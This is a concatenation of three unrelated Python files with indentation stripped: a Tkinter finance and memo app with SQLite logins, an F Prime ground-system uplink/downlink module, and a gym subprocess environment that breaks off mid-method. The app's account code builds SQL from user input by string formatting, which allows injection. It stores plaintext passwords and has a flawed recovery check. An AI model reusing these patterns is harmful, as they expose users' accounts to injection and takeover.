if len(self.username.get())>2 and len(self.password.get())>4 and len(self.phone.get())==11 and len(self.hubby.get())>3:
account=sqlite3.connect('account.db')
connet=account.cursor()
connet.execute("INSERT INTO account VALUES('{}','{}','{}','{}')".format(self.username.get(),self.password.get(),self.phone.get(),self.hubby.get()))
account.commit()
account.close()
self.splash_frame.grid_forget()
self.myframe.grid_forget()
root.unbind('<Return>',self.id2)
first.display()
#warning shown when there is no password nor username entres before the creation of the account
else:
warning=showwarning('Too short',"""Username or Password(must be greater than 4) Too Short
or phone number too short(must be accurate)""")
def forgot(self):
self.loginb.grid_forget()
self.login.grid_forget()
self.l.grid_forget()
self.l2.grid_forget()
self.username.grid_forget()
self.password.grid_forget()
self.forgotten.grid_forget()
self.visible.grid_forget()
self.rec1=Label(self.splash_frame,text='Your Phone Number')
self.rec1.grid(row=1,column=8,sticky='ns')
self.rec2=Entry(self.splash_frame,font=('Time',12),width=12)
self.rec2.grid(row=1,column=9,sticky='ns',padx=4)
self.rec3=Label(self.splash_frame,text='Your Hubby')
self.rec3.grid(row=2,column=8,sticky='ns',pady=5)
self.rec4=Entry(self.splash_frame,font=('Time',13),width=10)
self.rec4.grid(row=2,column=9,sticky='ns',pady=5)
self.rec5=Button(self.splash_frame,text='Recover',font=('Helvectica',10,'bold'),bd=9,borderwidth=1,command=lambda event='e':self.recover(event))
self.rec5.grid(row=3,column=8,sticky='ns')
self.rec6=Label(self.splash_frame,text='Confirm New Password')
self.rec7=Entry(self.splash_frame,font=('Time',13),width=13,show='*')
self.rec8=Button(self.splash_frame,text='Back',font=('Time',12),bd=9,borderwidth=2,command=self.home)
self.rec8.grid(row=3,column=9)
self.config_themes6()
self.password.unbind('<Return>',self.id1)
self.id3=root.bind('<Return>',self.recover,'+')
def home(self):
self.rec1.grid_forget()
self.rec2.grid_forget()
self.rec3.grid_forget()
self.rec4.grid_forget()
self.rec5.grid_forget()
self.rec6.grid_forget()
self.rec7.grid_forget()
self.rec8.grid_forget()
root.unbind('<Return>',self.id3)
root.after(10,lambda:set(root))
master.splash()
self.password.focus_set()
def recover(self,event):
account=sqlite3.connect('account.db')
connet=account.cursor()
recov=connet.execute("SELECT phone,hubby FROM account").fetchmany(2)
print(recov)
for c in recov:
self.recov1=c[0]
recov2=c[1]
if self.rec2.get()!=self.recov1 and self.rec4.get()!=recov2:
self.rec2.delete(0,'end')
self.rec4.delete(0,'end')
warning=showwarning('Wrong','Both Wrong')
else:
self.rec3.grid_forget()
self.rec4.grid_forget()
self.rec1.configure(text='Enter New Password')
self.rec2.delete(0,'end')
self.rec2.configure(width=13,show='*')
self.rec6.grid(row=2,column=8,sticky='ns',pady=5)
self.rec7.grid(row=2,column=9,sticky='ns',pady=5)
self.rec5.configure(text='Save',command=self.success)
def success(self):
if self.rec7.get()==self.rec2.get():
account=sqlite3.connect('account.db')
connet=account.cursor()
connet.execute("UPDATE account SET password=? WHERE phone=?",(self.rec2.get(),self.recov1))
account.commit()
account.close()
self.rec1.grid_forget()
self.rec2.grid_forget()
self.rec6.grid_forget()
self.rec7.grid_forget()
self.rec5.grid_forget()
self.rec8.grid_forget()
root.after(10,lambda:set(root))
master.splash()
else:
self.rec7.delete(0,'end')
warning=showerror('Error',"Password Did Not Match!")
def visibility(self):
global counter
counter+=1
if self.visible:
if counter==1:
self.password.config(show='')
self.visible.config(image=self.showb)
if counter>1:
self.password.config(show='*')
self.visible.config(image=self.showc)
counter=0
def verify(self,input):
if len(self.password.get())+1>12 and self.track2==1:
self.password.config(width=self.password.cget('width')+self.track2+1)
self.username.config(width=self.password.cget('width'))
self.id9=self.password.bind('<BackSpace>',self.function2)
if len(self.password.get())==20:
self.track=0
self.track2=0
self.id7=self.password.bind('<Key>',lambda e: 'break')
self.id8=self.password.bind('<BackSpace>',self.backspace2)
#print(3)
return True
def backspace2(self,event):
try:
self.password.unbind('<Key>',self.id7)
except tkinter.TclError:
pass
self.id11=self.password.bind('<Key>',self.function4)
if self.password.cget('width')>10:
threading.Thread(target=self.username.config(width=self.password.cget('width')-2)).start()
threading.Thread(target=self.password.config(width=self.password.cget('width')-2)).start()
if self.password.cget('width')==10:
self.username.config(width=10)
self.password.config(width=10)
def function2(self,event):
self.track2=0
self.id10=self.password.bind('<Key>',self.function3)
if self.password.cget('width')>10:
threading.Thread(target=self.username.config(width=self.password.cget('width')-1)).start()
threading.Thread(target=self.password.config(width=self.password.cget('width')-1)).start()
if self.password.cget('width')==10:
self.username.config(width=10)
self.password.config(width=10)
def function3(self,event):
if event.char.isdigit() or event.char.isalpha():
self.track2=1
try:
self.password.unbind('<BackSpace>',self.id9)
except tkinter.TclError:
pass
else:
self.track2=1
try:
self.password.unbind('<BackSpace>',self.id9)
self.password.unbind('<BackSpace>',self.id8)
except tkinter.TclError:
pass
def function4(self,event):
if event.char.isdigit() or event.char.isalpha():
self.track2=1
try:
self.password.unbind('<BackSpace>',self.id8)
except tkinter.TclError:
pass
else:
self.track2=1
try:
self.password.unbind('<BackSpace>',self.id8)
except tkinter.TclError:
pass
def move(self,event):
self.xp=event.x
self.yp=event.y
def move2(self,event):
deltax=event.x-self.xp
deltay=event.y-self.yp
splash_width=round(root.winfo_screenwidth()/1.92)
splash_height=round(root.winfo_screenheight()/1.54)
screen1=root.winfo_x()+deltax
screen2=root.winfo_y()+deltay
root.geometry(newGeometry='{}x{}+{}+{}'.format(splash_width,splash_height,screen1,screen2))
def resize(self):
self.z=1
root.withdraw()
root.overrideredirect(False)
root.iconify()
def framed(self,event=NONE):
root.overrideredirect(True)
if self.z==1:
root.after(10,lambda:set(root))
root.update()
self.z=0
def hover2(self,button):
button.widget.config(bg='#8193F7')
def hover3(self,button):
button.widget.config(bg=self.show.cget('bg'))
#function to change the login function of the splash
def config_themes3(self):
if self.data==0:
root.config(bg='white')
self.show.config(bg='white')
self.splash_frame.config(bg='white')
self.reg.config(bg='white')
self.toolwindow.config(bg='white')
self.toolwindow1.config(bg='white')
self.cancel.config(bg='white')
self.minimize.config(bg='white')
self.visible.config(bg='white',activebackground='white')
self.login.config(bg='white')
self.logb.config(bg='white')
self.loginb.config(bg='white',activebackground='white')
self.l.config(bg='white',fg='black')
self.l2.config(bg='white',fg='black')
self.l3.config(bg='white',fg='black')
self.l4.config(bg='white',fg='black')
self.l5.config(bg='white',fg='black')
if self.data==1:
root.config(bg='grey')
self.show.config(bg='grey')
self.splash_frame.config(bg='grey')
self.toolwindow.config(bg='grey')
self.toolwindow1.config(bg='grey')
self.cancel.config(bg='grey')
self.minimize.config(bg='grey')
self.visible.config(bg='grey',activebackground='grey')
self.reg.config(bg='grey')
self.logb.config(bg='grey')
self.loginb.config(bg='grey',activebackground='grey')
self.login.config(bg='grey')
self.l.config(bg='grey',fg='white')
self.l2.config(bg='grey',fg='white')
self.l3.config(bg='grey',fg='white')
self.l4.config(bg='grey',fg='white')
self.l5.config(bg='grey',fg='white')
if self.data==2:
root.config(bg='black')
self.show.config(bg='black')
self.toolwindow.config(bg='black')
self.toolwindow1.config(bg='black')
self.cancel.config(bg='black')
self.minimize.config(bg='black')
self.splash_frame.config(bg='black')
self.reg.config(bg='black')
self.logb.config(bg='black')
self.loginb.config(bg='black')
self.visible.config(bg='black',activebackground='black')
self.login.config(bg='black')
self.l.config(bg='black',fg='white')
self.l2.config(bg='black',fg='white')
self.l3.config(bg='black',fg='white')
self.l4.config(bg='black',fg='white')
self.l5.config(bg='black',fg='white')
if self.data==3:
root.config(bg='#151930')
self.show.config(bg='#151930')
self.splash_frame.config(bg='#151930')
self.reg.config(bg='#151930')
self.logb.config(bg='#151930')
self.toolwindow.config(bg='#151930')
self.toolwindow1.config(bg='#151930')
self.cancel.config(bg='#151930')
self.minimize.config(bg='#151930')
self.visible.config(bg='#151930',activebackground='#151930')
self.login.config(bg='#151930')
self.loginb.config(bg='#151930',activebackground='#151930')
self.l.config(bg='#151930',fg='white')
self.l2.config(bg='#151930',fg='white')
self.l3.config(bg='#151930',fg='white')
self.l4.config(bg='#151930',fg='white')
self.l5.config(bg='#151930',fg='white')
if self.data==4:
root.config(bg='white')
self.show.config(bg='white')
self.splash_frame.config(bg='white')
self.reg.config(bg='white')
self.logb.config(bg='white')
self.toolwindow.config(bg='white')
self.toolwindow1.config(bg='white')
self.cancel.config(bg='white')
self.minimize.config(bg='white')
self.login.config(bg='white')
self.visible.config(bg='white',activebackground='white')
self.loginb.config(bg='white',activebackground='white')
self.l.config(bg='white',fg='black')
self.l2.config(bg='white',fg='black')
self.l3.config(bg='white',fg='black')
self.l4.config(bg='white',fg='black')
self.l4.config(bg='white',fg='black')
#function to change the theme fogotton credentials functions
def config_themes4(self):
if self.data==0:
self.sp.config(bg='white')
self.forgotten.config(bg='white')
if self.data==1:
self.sp.config(bg='grey')
self.forgotten.config(bg='grey')
if self.data==2:
self.sp.config(bg='black')
self.forgotten.config(bg='black')
if self.data==3:
self.sp.config(bg='#151930')
self.forgotten.config(bg='#151930')
if self.data==4:
self.sp.config(bg='white')
self.forgotten.config(bg='white')
#memo class frame
class Memo(Financial):
def __init__(self,master):
self.master=master
def mem(self):
m = Image.open(rb"C:\Users\PASCAL\Desktop\FES Project\project 1\bmb.png")
m = m.resize((450,400))#resized
m = ImageTk.PhotoImage(m)
self.top3=Toplevel()
self.top3.attributes('-fullscreen',True)
self.top3.wm_title('Memo')
self.top3.iconphoto(False,m)
self.top3.wm_geometry('600x400')
men=Menu(self.top3)
self.top3.config(menu=men)
f_menu=Menu(men,tearoff=0)
e_menu=Menu(men,tearoff=0)
men.add_cascade(label='File',menu=f_menu)
men.add_cascade(label='Edit',menu=e_menu)
p_menu=Menu(men,tearoff=0)
pa_menu=Menu(men,tearoff=0)
men.add_cascade(label='Paragraph',menu=pa_menu)
men.add_cascade(label='Print',menu=p_menu)
p_menu.add_command(label='Print')
e_menu.add_command(label='Copy')
e_menu.add_command(label='Paste',command=self.insert_pic)
e_menu.add_command(label='Cut')
e_menu.add_command(label='Undo')
e_menu.add_command(label='Redo')
f_menu.add_command(label='Save')
f_menu.add_command(label='SaveAs')
f_menu.add_command(label='Delete')
f_menu.add_command(label='Open',command=self.open)
pa_menu.add_command(label='Indented')
pa_menu.add_command(label='Block')
pa_menu.add_command(label='Centre')
pa_menu.add_command(label='Left')
pa_menu.add_command(label='Right')
l1=Label(self.top3,text='Ready',font=('Helvetica',12))
l1.grid(sticky='es')
sc3=Scrollbar(self.top3,orient='vertical')
self.textbox=Text(self.top3,font=('Helvetica',13),width=100,height=32,selectbackground='powder blue',
undo=True,selectforeground='black',yscrollcommand=sc3.set)
self.textbox.grid(row=0,column=0)
sc3.config(command=self.textbox.yview)
sc3.grid(row=0,column=1,sticky='ns')
def open(self):
self.file=askopenfilename(parent=self.top3,title='Open File',filetypes=(['Text Files','.txt'],['PDF','.pdf'],['Microsoft Doc','.docx'],['Retrieve Text From Any File','*']))
if self.file:
print(self.file)
the_file=open(self.file)
self.textbox.insert(1.0,the_file.read())
def insert_pic(self):
self.file2=askopenfilename(parent=self.top3,title='insert image',filetypes=(['PNG','.png'],['JPEG','.jpg'],['Bitmap','.bmp']))
if self.file2:
in_image=Image.open(self.file2)
in_image=ImageTk.PhotoImage(in_image)
self.textbox.image_create(1.1,image=in_image)
self.textbox.in_image=in_image
#The app Main menu
class Main(Financial):
def __init__(self,object):
#self.to=object.top
self.f=object.showit
self.main=main
self.nam=object.data
self.screen1=round(root.winfo_screenheight()/27)
self.screen2=round(root.winfo_screenheight()-self.screen1)
self.icon1=Canvas(root,highlightthickness=0,width=root.winfo_screenwidth(),height=self.screen2+10)
self.fra1=Frame(self.icon1,highlightthickness=0)
self.maxi=Image.open(rb"C:\Users\PASCAL\Desktop\FES Project\project 1\maximize.png")
self.t =Image.open(rb"C:\Users\PASCAL\Desktop\FES Project\project 1\suunday.png")
self.z=Image.open(rb"C:\Users\PASCAL\Desktop\FES Project\project 1\settings.png")
self.m = Image.open(rb"C:\Users\PASCAL\Desktop\FES Project\project 1\bmb.png")
self.y=Image.open(rb"C:\Users\PASCAL\Desktop\FES Project\project 1\Monthly.png")
self.label = Button(self.fra1, text='Financial Analysis', font=('blue', 13, 'bold'),borderwidth=0,bd=0,command=master.get)
self.b = Button(self.fra1, borderwidth=0,command=master.get)
memory=sqlite3.connect(':memory:')
mem=memory.cursor()
mem.execute("CREATE TABLE icon(image TEXT)")
#mem.execute("INSERT INTO icon(image) VALUES(?)",[sqlite3.Binary(t)])
memory.commit()
def display(self):
self.maxi=ImageTk.PhotoImage(self.maxi)
self.toolwindow1=Canvas(root,width=root.winfo_screenwidth(),height=self.screen1,bg='black',highlightthickness=0)
self.toolwindow=Frame(self.toolwindow1,bg='black')
self.maximize=Button(self.toolwindow,image=self.maxi,bd=0,borderwidth=0,bg='black')
self.maximize.grid(row=0,sticky='e')
root.wm_title('F-BOX')
root.geometry('{}x{}+-0+1'.format(root.winfo_screenwidth(),root.winfo_screenheight()-1))
root.after(10,lambda:set(root))
my4=Hovertip(self.b,'Daily\nFinancial Analysis')
self.v=StringVar()
self.v.set('grey')
self.f.grid_forget()
root.resizable(1,1)
#F-analysis icon image
self.b.grid(row=0,column=0,sticky='nsew')
self.label.grid(row=1,column=0,sticky='nsew')
#memo icon image
#memo button trigger
self.b2 = Button(self.fra1, borderwidth=0,command=main.mem)
#self.b2.self.m=self.m
self.b2.grid(row=0,column=1,padx=round(root.winfo_screenheight()/18),sticky='nsew')
my1=Hovertip(self.b2,'Text Editor',hover_delay=500)
# memo button trigger 2
self.label2 = Button(self.fra1, text='Memo', font=('blue', 12, 'bold'),borderwidth=0,bd=0,command=main.mem)
self.label2.grid(row=1, column=1,padx=round(root.winfo_screenheight()/18),sticky='nsew')
#f-analysis button trigger 2
#f-analysis button trigger
#monthly analysis button image icon
self.b3=Button(self.fra1,borderwidth=0,bd=0)
self.b3.grid(row=0,column=2,padx=round(root.winfo_screenheight()/18),sticky='nsew')
my2=Hovertip(self.b3,'Monthly Report',hover_delay=500)
self.label3=Button(self.fra1,text='Monthly Analysis',font=('Time',13,'bold'),borderwidth=0,bd=0)
self.label3.grid(row=1,column=2,padx=round(root.winfo_screenheight()/18),sticky='nsew')
#settings buttin image icon
self.se=Button(self.fra1,borderwidth=0,padx=round(root.winfo_screenheight()/18),command=master.bind)
self.label4=Button(self.fra1,text='Settings',font=('Time',13,'bold'),borderwidth=0,bd=0,command=master.bind)
self.se.grid(row=0,column=3,padx=round(root.winfo_screenheight()/18),sticky='nsew')
my3=Hovertip(self.se,'Setings And Configuration',hover_delay=500)
self.label4.grid(row=1,column=3,sticky='nsew')
#App icon image
p = Image.open("D:\FES2.png")
p = p.resize((50, 50))
p = ImageTk.PhotoImage(p)
root.iconphoto(False, p)
root.config(bg=self.v.get())
#self.fra1.grid(row=1,column=0,sticky='nsew')
#self.fra2.grid(row=1,column=1,sticky='nsew')
#self.fra3.grid(row=1,column=2,sticky='nsew')
#self.fra4.grid(row=1,column=3,sticky='nsew')
Grid.columnconfigure(self.fra1 ,0,weight=1)
Grid.columnconfigure(self.fra1,2,weight=1)
Grid.rowconfigure(self.fra1,0,weight=1)
Grid.rowconfigure(self.fra1,1,weight=1)
Grid.columnconfigure(self.fra1,1,weight=1)
Grid.columnconfigure(self.fra1,3,weight=1)
threading.Thread(target=root.update).start()
self.geo=root.winfo_width()
self.geo2=root.winfo_height()
#self.print2('e')
self.theme_change()
self.toolwindow1.update_idletasks()
self.icon1.update_idletasks()
self.icon1.grid_propagate(False)
self.toolwindow1.grid_propagate(False)
self.toolwindow1.create_window(1800,round(self.geo2/120),anchor='n',window=self.toolwindow)
self.icon1.create_window(0,round(root.winfo_screenheight()/4.7),anchor='w',window=self.fra1)
self.toolwindow1.grid(row=0,column=0,sticky='n')
self.icon1.grid(row=1,column=0,sticky='nsew')
root.bind('<Configure>',self.print2)
root.after_idle(root.focus_force)
#root.state('zoomed')
def theme_change(self):
if self.nam==0:
root.config(bg='grey')
self.b2.config(bg='grey',activebackground='grey')
self.label2.config(bg='grey',activebackground='grey',fg='white')
self.label.config(bg='grey',activebackground='grey',fg='white')
self.b.config(bg='grey',activebackground='grey')
self.b3.config(bg='grey',activebackground='grey')
self.label3.config(bg='grey',activebackground='grey',fg='white')
self.se.config(bg='grey',activebackground='grey')
self.label4.config(bg='grey',activebackground='grey',fg='white')
self.fra1.config(bg='grey')
self.icon1.config(bg='grey')
if self.nam==1:
root.config(bg='grey')
self.b2.config(bg='grey',activebackground='grey')
self.label2.config(bg='grey',activebackground='grey',fg='white')
self.label.config(bg='grey',activebackground='grey',fg='white')
self.b.config(bg='grey',activebackground='grey')
self.b3.config(bg='grey',activebackground='grey')
self.label3.config(bg='grey',activebackground='grey',fg='white')
self.se.config(bg='grey',activebackground='grey')
self.label4.config(bg='grey',activebackground='grey',fg='white')
self.fra1.config(bg='grey')
self.icon1.config(bg='grey')
if self.nam==2:
root.config(bg='black')
self.b2.config(bg='black',activebackground='black')
self.label2.config(bg='black',activebackground='black',fg='white')
self.label.config(bg='black',activebackground='black',fg='white')
self.b.config(bg='black',activebackground='black')
self.b3.config(bg='black',activebackground='black')
self.label3.config(bg='black',activebackground='black',fg='white')
self.se.config(bg='black',activebackground='black')
self.label4.config(bg='black',activebackground='black',fg='white')
self.fra1.config(bg='black')
self.icon1.config(bg='black')
if self.nam==3:
root.config(bg='#151930')
self.b2.config(bg='#151930',activebackground='#151930')
self.label2.config(bg='#151930',activebackground='#151930',fg='white')
self.label.config(bg='#151930',activebackground='#151930',fg='white')
self.b.config(bg='#151930',activebackground='#151930')
self.b3.config(bg='#151930',activebackground='#151930')
self.label3.config(bg='#151930',activebackground='#151930',fg='white')
self.se.config(bg='#151930',activebackground='#151930')
self.label4.config(bg='#151930',activebackground='#151930',fg='white')
self.fra1.config(bg='#151930')
self.icon1.config(bg='#151930')
if self.nam==4:
root.config(bg='white')
self.b2.config(bg='white',activebackground='white')
self.label2.config(bg='white',activebackground='white',fg='black')
self.label.config(bg='white',activebackground='white',fg='black')
self.b.config(bg='white',activebackground='white')
self.b3.config(bg='white',activebackground='white')
self.label3.config(bg='white',activebackground='white',fg='black')
self.se.config(bg='white',activebackground='white')
self.label4.config(bg='white',activebackground='white',fg='black')
self.fra1.config(bg='white')
self.icon1.config(bg='white')
def print2(self,event):
#p=threading.Thread(target=self.print)
#p1=threading.Thread(target=self.print3)
#p2=threading.Thread(target=self.print4)
#p3=threading.Thread(target=self.print5)
#p.start()
#p1.start()
#p2.start()
#p3.start()
#self.print4()
self.print()
self.print3()
self.print4()
self.print5()
#Process(target=self.print4).run()
def resize1(self):
pass
def print(self):
if self.m:
iw,ih=self.m.width,self.m.height
mw,mh=root.winfo_width(),root.winfo_height()
if self.geo==mw:
iw=self.geo//5
ih=self.geo//5
self.ic1 =ImageTk.PhotoImage(self.t.resize((iw, ih)),Image.NEAREST)
self.b.configure(image=self.ic1)
self.label.config(font=('Helvectica',12,'bold'))
else:
iw=mw//5
ih=mw//5
self.ic1 = ImageTk.PhotoImage(self.t.resize((iw, ih)),Image.NEAREST)
self.b.configure(image=self.ic1)
self.label.config(font=('Helvectica',round((mw*0.00625)+3),'bold'))
def print3(self):
if self.m:
iw,ih=self.m.width,self.m.height
mw,mh=root.winfo_width(),root.winfo_height()
if self.geo==mw:
iw=self.geo//5
ih=self.geo//5
self.ic2 = ImageTk.PhotoImage(self.m.resize((iw,ih)),Image.NEAREST)
self.b2.config(image=self.ic2)
self.label2.config(font=('Helvectica',12,'bold'))
else:
iw=mw//5
ih=mw//5
self.ic2= ImageTk.PhotoImage(self.m.resize((iw,ih)),Image.NEAREST)
self.b2.config(image=self.ic2)
self.label2.config(font=('Helvectica',round((mw*0.00625)+3),'bold'))
def print4(self):
if self.m:
iw,ih=self.m.width,self.m.height
mw,mh=root.winfo_width(),root.winfo_height()
if self.geo==mw:
iw=self.geo//5
ih=self.geo//5
self.ic3=ImageTk.PhotoImage(self.y.resize((iw,ih)),Image.NEAREST)
self.b3.config(image=self.ic3)
self.label3.config(font=('Helvectica',12,'bold'))
else:
iw=mw//5
ih=mw//5
self.ic3=ImageTk.PhotoImage(self.y.resize((iw,ih)),Image.NEAREST)
self.b3.config(image=self.ic3)
self.label3.config(font=('Helvectica',round((mw*0.00625)+3),'bold'))
def print5(self):
if self.m:
iw,ih=self.m.width,self.m.height
mw,mh=root.winfo_width(),root.winfo_height()
if self.geo==mw:
iw=self.geo//5
ih=self.geo//5
self.ic4=ImageTk.PhotoImage(self.z.resize((iw,ih)),Image.NEAREST)
self.se.config(image=self.ic4)
self.label4.config(font=('Helvectica',13,'bold'))
else:
iw=mw//5
ih=mw//5
self.ic4=ImageTk.PhotoImage(self.z.resize((iw,ih)),Image.NEAREST)
self.se.config(image=self.ic4)
self.label4.config(font=('Helvectica',round((mw*0.00625)+3),'bold'))
class Task(Main,Financial):
def __init__(self,object1,object2):
self.n=object2.top
self.x=object1.b
self.bc=object1.label
def close(self):
root.deiconify()
self.x.config(command=lambda:self.n.deiconify())
try:
self.n.iconify()
except tkinter.TclError:
pass
class FLASHWINFO(ctypes.Structure):
_fields_=[('cbSize',ctypes.c_uint),
('hwnd',ctypes.c_uint),
('dwFlags',ctypes.c_uint),
('dwTimeout',ctypes.c_uint)]
GWL_EXSTYLE=-20
WS_EX_APPWINDOW=0x00040000
WS_EX_TOOLWINDOW=0x00000080
def close2(event):
root.destroy()
def set(window):
j=ctypes.windll.user32.GetParent(window.winfo_id())
style=ctypes.windll.user32.GetWindowLongPtrW(j,GWL_EXSTYLE)
style=style & -WS_EX_TOOLWINDOW
style=style | WS_EX_APPWINDOW
res=ctypes.windll.user32.SetWindowLongPtrW(j,GWL_EXSTYLE,style)
window.withdraw()
window.after(10,lambda:window.deiconify())
#window.grab_set()
#window.attributes('-topmost',True)
count1=0
counter=0
master=Financial(root)
main=Memo(root)
first=Main(master)
second=Task(first,master)
third=Login(master)
lgh=[]
h=[]
h1=[]
h2=[]
h3=[]
h4=[]
h5=[]
h6=[]
h7=[]
h8=[]
h10=[]
h11=[]
test=[]
test2=[]
kist = []
list2=[]
list3=[]
list4=[]
list5=[]
list6=[]
list7=[]
list8=[]
list9=[]
graph=[]
root.bind('<Alt-F4>',close2)
root.update()
#root.bind('<Enter>',master.logined)
if __name__=='__main__':
freeze_support()
root.after(10,lambda:set(root))
third.splash()
mainloop()
|
updown.py
|
""" Uplink and Downlink handling for communications layer
Downlink needs to happen in several stages. First, raw data is read from the adapter. This data is collected in a pool
and the pool is passed to a deframer that extracts frames from this pool. Frames are queued and sent to the ground
side where they are and passed into the ground side handler and onto the other GDS processes. Downlink handles multiple
streams of data the FSW downlink, and loopback data from the uplink adapter.
Uplink is the reverse, it pulls data in from the ground handler, frames it, and sends it up to the waiting FSW. Uplink
is represented by a single thread, as it is not dealing with multiple streams of data that need to be multiplexed.
"""
import threading
from queue import Queue, Full, Empty
import logging
from fprime.common.models.serialize.numerical_types import U32Type
from fprime_gds.common.utils.data_desc_type import DataDescType
from fprime_gds.common.communication.adapters.base import BaseAdapter
from fprime_gds.common.communication.ground import GroundHandler
from fprime_gds.common.communication.framing import FramerDeframer
DW_LOGGER = logging.getLogger("downlink")
UP_LOGGER = logging.getLogger("uplink")
class Downlinker:
"""Encapsulates communication downlink functions
Handles downlink creating two threads, one to read and deframe, and the other to send data out to the ground side
of the system. It is composed of an adapter used to read from the interface, a deframer that is used to deframe
incoming data, and a ground handler that is used to interact with the ground side of the system.
Two threaded stages are used to multiplex between loopback data and FSW downlink data without the need to busy spin
waiting for data.
"""
def __init__(
self, adapter: BaseAdapter, ground: GroundHandler, deframer: FramerDeframer
):
"""Initialize the downlinker
Constructs a new downlinker object used to run the downlink and deframing operation.
Args:
adapter: adapter used to read raw data from the hardware connection
ground: handles the ground side connection
deframer: deframer used to deframe data from the communication format
"""
self.running = True
self.th_ground = None
self.th_data = None
self.adapter = adapter
self.ground = ground
self.deframer = deframer
self.outgoing = Queue()
def start(self):
""" Starts the downlink pipeline """
self.th_ground = threading.Thread(target=self.sending)
self.th_ground.daemon = True
self.th_ground.start()
self.th_data = threading.Thread(target=self.deframing)
self.th_data.daemon = True
self.th_data.start()
def deframing(self):
"""Deframing stage of downlink
Reads in data from the raw adapter and runs the deframing. Collects data in a pool and continually runs
deframing against it where possible. Then appends new frames into the outgoing queue.
"""
pool = b""
while self.running:
# Blocks until data is available, but may still return b"" if timeout
pool += self.adapter.read()
frames, pool = self.deframer.deframe_all(pool, no_copy=True)
try:
for frame in frames:
self.outgoing.put_nowait(frame)
except Full:
DW_LOGGER.warning("GDS ground queue full, dropping frame")
def sending(self):
"""Outgoing stage of downlink
Adapts the downlink adapter to the rest of the GDS system by draining the outgoing queue and sending those
packets to the rest of the GDS. This uses the ground send_all method.
"""
while self.running:
frames = []
try:
# Blocking read of at least one frame, then drain the entire queue
frames.append(self.outgoing.get(timeout=0.500))
while not self.outgoing.empty():
frames.append(self.outgoing.get_nowait())
except Empty:
pass
self.ground.send_all(frames)
def stop(self):
""" Stop the thread depends will close the ground resource which may be blocking """
self.running = False
def join(self):
""" Join on the ending threads """
for thread in [self.th_data, self.th_ground]:
if thread is not None:
thread.join()
def add_loopback_frame(self, frame):
"""Adds a frame to loopback to ground
Some uplink processes are virtualized on the ground, and thus must loopback packets. This is used for data
handshaking that the FSW may not support.
Args:
frame: frame to loopback to ground
"""
try:
self.outgoing.put_nowait(frame)
except Full:
DW_LOGGER.warning("GDS ground queue full, dropping loopback frame")
class Uplinker:
"""Uplinker used to pull data out of the ground layer and send to FSW
Handles uplink by creating a single thread to read data from the ground layer, frame it, and pass it to the adapter
to the hardware link to flight software. It is composed of an adapter used to write to the interface, a framer
that is used to frame outgoing data, and a ground handler that is used to interact with the ground side of the
system.
Since there is one stream of data the uplink requires only one thread to run.
"""
RETRY_COUNT = 3
def __init__(
self,
adapter: BaseAdapter,
ground: GroundHandler,
framer: FramerDeframer,
loopback: Downlinker,
):
"""Initializes the uplink class
Initialize the uplink class using a hardware adapter, ground handler, and framer.
loopback is used to virtualize the return packet handshake as FSW does not handle that.
Args:
adapter: hardware adapter used to write raw outgoing data bytes
ground: ground handler receiving data from the ground system
framer: framer used to frame wire bytes
loopback: used to return handshake packets
"""
self.th_uplink = None
self.running = True
self.ground = ground
self.adapter = adapter
self.loopback = loopback
self.framer = framer
def start(self):
""" Starts the uplink pipeline """
self.th_uplink = threading.Thread(target=self.uplink)
self.th_uplink.daemon = True
self.th_uplink.start()
def uplink(self):
"""Runs uplink of data from ground to FSW
Primary stage of the uplink process, reads data from the ground adapter, and passes the rest of the data to the
framer, and then onto the adapter to send to FSW. Uplink also generates handshake packets as the current FSW
does not generate handshake packets.
"""
try:
while self.running:
packets = self.ground.receive_all()
for packet in [
packet
for packet in packets
if packet is not None and len(packet) > 0
]:
framed = self.framer.frame(packet)
# Uplink handles synchronous retries
for retry in range(0, Uplinker.RETRY_COUNT):
if self.adapter.write(framed):
self.loopback.add_loopback_frame(
Uplinker.get_handshake(packet)
)
break
else:
UP_LOGGER.warning(
"Uplink failed to send %d bytes of data after %d retries",
len(framed), Uplinker.RETRY_COUNT
)
# An OSError might occur during shutdown and is harmless. If we are not shutting down, this error should be
# propagated up the stack.
except OSError:
if self.running:
raise
def stop(self):
""" Stop the thread depends will close the ground resource which may be blocking """
self.running = False
def join(self):
""" Join on the ending threads """
if self.th_uplink is not None:
self.th_uplink.join()
@staticmethod
def get_handshake(packet: bytes) -> bytes:
"""Gets a handshake raw frame from the last packet
Creates a handshake raw-frame by repeating the contents of the last packet with a handshake descriptor at the
front.
Args:
packet: packet to repeat back out as handshake
Returns:
handshake packet
"""
return U32Type(DataDescType["FW_PACKET_HAND"].value).serialize() + packet
|
subproc_vec_env.py
|
import numpy as np
from multiprocessing import Process, Pipe
from . import VecEnv, CloudpickleWrapper
from baselines.common.tile_images import tile_images
from gym.envs.classic_control import rendering
def worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x()
try:
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'render':
remote.send(env.render(mode='rgb_array'))
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
else:
raise NotImplementedError
except KeyboardInterrupt:
print('SubprocVecEnv worker: got KeyboardInterrupt')
finally:
env.close()
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns, spaces=None):
"""
envs: list of gym environments to run in subprocesses
"""
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
self.viewer = None
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def reset_task(self):
for remote in self.remotes:
remote.send(('reset_task', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
